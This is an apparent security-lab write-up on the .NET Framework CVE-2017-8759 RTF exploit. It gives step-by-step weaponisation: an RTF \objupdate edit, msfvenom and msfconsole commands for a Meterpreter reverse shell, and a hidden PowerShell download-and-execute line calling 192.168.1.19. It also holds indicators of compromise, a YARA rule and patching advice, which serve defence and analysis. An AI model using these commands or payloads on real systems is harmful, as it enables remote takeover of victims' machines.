.NET Framework zero day Vulnerability (CVE-2017-8759)

Introduction

With the help of this report I will explain how we make a POC exploitable. In place of malicious payload, I use reverse connection (Shell.exe) payload with the help of Metasploit.

Description

Dot NET Framework Remote Code Execution Vulnerability.

Microsoft Windows is prone to remote code-execution vulnerability. Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. Failed exploit attempts will result in denial-of-service conditions.

Remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. To exploit the vulnerability, an attacker would first need to convince the user to open a malicious document or application. The security update addresses the vulnerability by correcting how .NET validates untrusted input.

File Details:

Filename Cve-2017-8759.rtf
Size 5.6 Kilobytes
MD5 96d819af7bca99ffb360b5014647a97c
SHA1 365d0c3518b8836470a5bf74981ba9c0775db26b
SHA256 97ee741a4361ac7b7c3a773bce31bb08948b5b389571fd9bb631febdf76efa13

 

Vulnerable Versions

According to Microsoft, the following are the affected products

  • Microsoft .NET Framework 2.0 SP2
  • Microsoft .NET Framework 3.5
  • Microsoft .NET Framework 3.5.1
  • Microsoft .NET Framework 4.5.2
  • Microsoft .NET Framework 4.6
  • Microsoft .NET Framework 4.6.1
  • Microsoft .NET Framework 4.6.2
  • Microsoft .NET Framework 4.7

Attack Process

The attack occurs in the following manner:

  • Create Rtf file, with the help of Python script or manually.
  • When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious HTA file.
  • The HTA file returned by the server with an embedded malicious script.
  • exe looks up the file handler for application/hta through a DLLobject, which causes the Microsoft HTA application (mshta.exe) to load and execute the malicious script.

Exploitation Steps

Step 1: – Create RTF file

First, we create RTF file, as I discussed above we can create rtf file with the help of python script as well as manually, here I explain how we create rtf file manually.

Firstly, the issue occurs using an OLE2 embedded link object, secondly while handling a HTA file.

To embed an OLE2 link object into a document, open Microsoft Word and click on the insert object button, Select Create From File, insert the URL to the HTA file and tick Link to file  as shown in Figure 1: Figure 1

Save the document as a DOCX, DOC or RTF file; all of which handle OLE2 link objects.

This can be achieved by not selecting the “Display as Icon” check box and serve the document content-type as application/rtf or application/doc: This causes the HTA to be rendered as follows:

Figure 2

However, user interaction is still required and the user must double click on the “Testing” text as shown in Figure 2 this time or save the file to force the document to perform the connection to update the content and display it.

As such, it should be possible to create a document containing a \objupdate control that will ultimately force it to update on start up. This can be achieved by taking the previously created document and modifying it in a text editor:

 Original:

{\object\objautlink\rsltpict\objw9027\objh450{\*\objclass Word.Document.8}{\*\objdata

Modified:

{\object\objautlink\objupdate\rsltpict\objw9027\objh450{\*\objclass Word.Document.8}{\*\objdata

 Document with injected \objupdate” controlis shown in Figure 3:

 

Figure 3

 

Step 2 : – Prepare server (As shown in Figure 4)

  1. Run a web server on port 80, and put the files exploit.txt and cmd.hta on its root.
  2. Generate metasploit payload and start handler

a>msfvenom -p windows/meterpreter/reverse_tcp LHOST=”Your Local pc IP” LPORT=4444 -f                   exe > /tmp/shell.exe

(Above command, used to create payload with the help of Metasploit)

b>msfconsole -x “use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set                        LHOST”Your Local pc IP”; run”

                        (Above command used to start handler, Handle reverse connection of target pc)
Figure 4

Flow of the exploit:

Word macro runs in the test.rtf file. The macro downloads a badly formatted txt file over WSDL, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe. Mshta.exe use to call cmd.hta file from server and execute it.

This HTA file is used to call power-shell command that downloads and executesshell.exe (used to make reverse connection with server) as shown in Figure 5 & Figure 6

Figure 5 (Flow of Process)

Figure 6(HTA script use to download and execute shell.exe)

Technical details

This vulnerability (CVE-2017-8759) triggers due to improper handling of SOAP WSDL response and leads to remote code execution. Attackers are using crafted RTF files to exploit the vulnerability. This RTF file contains an embedded OLE object which consists of SOAP Moniker CLSID and link to remotely hosted SOAP WSDL definition file as shown in Figure7

Figure 7(RTF doc with embedded OLE object points to SOAP& WSDL definition)

Opening the RTF file now causes the hosted HTA file to run without user interactionas shown in Figure 8:

The two documents in which SMA-LAB observed these attacks, malicious scripts terminated the winword.exe processes, downloaded additional payloads, the original winword.exe process was terminated to conceal a user prompt generated by the OLE2link.

Figure 8

This malicious document identified by SMA-LAB had two stages.  When RTF is opened by winword.exe, it issues request to malicious SOAP WSDL definition from compromised website.

In response WSDL definition get downloaded and processed by WSDL parser module. As shown in below Figure 9.

Figure 9

Winword.exe makes a request to the DCOMLaunch service, which in turn causes the svchost.exe process hosting DCOMLaunch to execute mshta.exe.

Figure 9 shows injected code which is executed by WSDL SOAP parser. Due to lack of proper validation it executes injected code. It then downloads and executes remotely hosted “cmd.hta” file with the help of mshta.exe. This .hta script is obfuscated;Figure 10 shows the script after de-obfuscation.
Figure 10

As shown in Figure 10 de-obfuscated script powershell.exe is executed , to download and execute malware “shell.exe” from the compromised website.

The above 2 scripts perform the following malicious actions:

The obfuscated “Logo.cs” script performs the following actions when executed:

  • Terminates the winword.exe process with taskkill.exe to hide the prompt.
  • Cleans up the Word Resiliency keys for Word versions 15.0 and 16.0 so that Microsoft Word will restart normally.
  • Writes an embedded obfuscated script to “Local Settings\Temporary Internet Files\Content.IE5\LVFW6WQJ\”/cmd.hta
  • Executes the script.

 The obfuscated “cmd.hta” script performs the following actions when executed:

  • Attempts to delete itself from the system.
  • Attempts to connected from http[:]//192.168.1[.]19/shell.exe, and save the file in temp location  %TMP%\shell.exe
  • Executes %TMP%\shell.exe

Some suspicious activity is captured by our SMA-LAB, while we run cve-2017-8759 inside our lab.

System Affected

Files Written by (Process cvtres.exe)
  • c:\WINDOWS\system32\Com\SOAPAssembly\http1001924168414190logo4txt.dll
Files Written by (Process csc.exe)
  • c:\WINDOWS\system32\Com\SOAPAssembly\http1001924168414190logo4txt.dll
  • c:\WINDOWS\system32\Com\SOAPAssembly\CSCD.tmp
  • c:\WINDOWS\system32\Com\SOAPAssembly\http1001924168414190logo4txt.pdb
Files Written by (Process mshta.exe)
  • C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LVFW6WQJ\cmd[1].hta
  • \\?\PIPE\ROUTER
Files Written by (Process WINWORD.EXE)
  • C:\Documents and Settings\Administrator\Application Data\Microsoft\UProof\CUSTOM.DIC
  • C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word\~WRS{47FAD676-59FC-46B6-A517-280E4A3CF27C}.tmp
  • C:\Documents and Settings\Administrator\Local Settings\Temp\5rde1qv3.out
  • C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dotm
  • C:\WINDOWS\system32\Com\SOAPAssembly\Logo.cs
  • \\?\PIPE\lsarpc
  • C:\Documents and Settings\Administrator\Local Settings\Temp\5rde1qv3.cmdline
  • C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word\~WRS{25FC9202-2287-4439-9288-A2C9132790D4}.tmp
  • C:\Documents and Settings\Administrator\Local Settings\Temp\5rde1qv3.0.cs
  • C:\Documents and Settings\Administrator\Local Settings\Temp\~$test.rtf
  • \\?\PIPE\ROUTER
 Registry keys written by (Process mshta.exe)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CacheLimit
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CacheLimit
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CacheLimit
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CacheLimit
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Paths
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory
Mutexes accessed
    • RasPbFile
    • ZonesCacheCounterMutex
    • WininetConnectionMutex
    • MsnSspcPrivatePwdMutex
    • ZonesCounterMutex
    • ZonesLockedCacheCounterMutex
Processes created by (Process csc.exe)
  • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\RESE.tmp”
  • “c:\WINDOWS\system32\Com\SOAPAssembly\CSCD.tmp”
Processes created by (Process mshta.exe)
  • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(‘http://192.168.1.19/shell.exe’, ‘c:/windows/temp/shell.exe’); c:/windows/temp/shell.exe
 Processes created by (Process WINWORD.EXE)
  • “C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe” /noconfig /fullpaths @”C:\Documents and Settings\Administrator\Local Settings\Temp\5rde1qv3.cmdline”
  • C:\WINDOWS\system32\mshta.exe http://192.168.1.19/cmd.hta
  • “C:\Windows\System32\mshta.exe” http://192.168.1.19/cmd.hta

Suspicious Activity Captured in memory

8 events with 5 signaturescaptured in memory.

5 signatures such as:

  • Creates executable on system
  • Create suspicious process

 

 

 

  • Create alternate data stream

 

  • Deletes its original binary from disk

  • Creates a suspicious powershell process 

Payload Analysis

Description

Shell.exeis used to make reverse connection with server. As shown in Figure 11

Figure 11

After getting the shell Access we can perform activity like getting system information, downloading file, and executing command.

For instance if I want to know IP of victim pc. Just type “ipconfig” in meterpreter and we get IP address of victim pc, AS shown in Figure 12

Figure 12

Command which is able to execute through meterpreter on victim pc,as shown in Figure 13

Figure 13

NOTE: – Attacker uses any malicious payload instead of shell.exe on victim’s pcsuch as Ransomware, keylogger, trojan, worm.

We use the following YARA rule to hunt for these RTF documents:

rule ksig_CVE_2017_8759

{

meta:

description = “Malicious RTF file CVE-2017-8759”

author = “SMA-LAB”

date = “2018-01-08”

strings:

$rtf = {7B5C7274}

$obj = {5C6F626A6175746C696E6B5C6F626A757064617465}

$wsdl = “7700730064006c003d00” nocase

condition:

all of them

}

Conclusion

As malware actors have already started using this particular Microsoft Office exploit, we are expecting more malicious campaigns to be devised around it. As mentioned earlier, this vulnerability has been patched and the security updates are available for it. We strongly recommend users to apply the latest security updates released by Microsoft.

Recommendations

Run all software as a non-privileged user with minimal access rights.

Deploy network intrusion detection systems to monitor network traffic for malicious activity.

Do not accept or execute files from untrusted or unknown sources.

Do not follow links provided by unknown or untrusted sources.

Implement multiple redundant layers of security.

Reference Link

[H**ps://support.microsoft.com/en-in/help/4040959/description-of-the-security-only-update-for-the-net-framework-4-5-2-fo]

 

 

 

 

 

 

 

 

 

 

 

 

 

This page is intentionally left blank

 

No Comments

Post a Comment

Comment
Name
Email
Website